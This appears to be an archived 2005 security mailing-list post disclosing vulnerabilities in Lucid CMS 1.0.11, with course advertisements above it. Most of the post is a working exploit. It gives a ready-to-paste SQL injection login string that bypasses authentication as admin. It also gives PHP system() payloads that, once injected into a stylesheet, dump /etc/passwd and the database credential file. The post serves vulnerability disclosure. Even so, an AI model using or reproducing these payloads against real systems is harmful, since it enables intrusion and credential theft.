Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution

from [retrogod] Network Security [Permanent Link]
Subject: Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution
Date: 29 Sep 2005 20:51:24 -0000 
Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution

software:
site: http://lucidcms.net/
description:
lucidCMS is a simple and flexible content management system for the individual 
or
organization that wishes to manage a collection of web pages without the 
overhead
and complexity of other available "community" CMS options.


1) if magic quotes off -> SQL Injection:

you can login as admin typing in login form:


login: 
'UNION(SELECT'1','admin','admin','FAKE@hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*
pass: [nothing]                                                   ^
                                                                  |
                                                                  |
                                                            this is the hash 
of...nothing
                                                            the result of 
md5('');
note:"login" without spaces

the login query become:
SELECT * FROM lucid_users WHERE 
name=''UNION(SELECT'1','admin','admin','FAKE@hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*'

2)
now new admin can edit template and insert evil javascript code, see the 
phpinfo(), manage users/groups,
activate/disable plugins, you can activate renderPHP plugin, add the following 
line at the end of
the main stylesheet:

<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>

to see /etc/passwd file

<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>

to see database username/password, the database name and table prefix... now 
you have the full control
of the database


rgod
site: http://altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/lucidcms1011.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution, retrogod <=
Previous by Date:  [Full-disclosure] Re: Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC, Paul Laudanski
Next by Date:  [Full-disclosure] Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC", Zone Labs Security Team
Previous by Thread:  Serendipity: Account Hijacking / CSRF Vulnerability, enji
Next by Thread:  [Full-disclosure] Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC", Zone Labs Security Team
Indexes:  [Date] [Thread] [Top] [All Lists]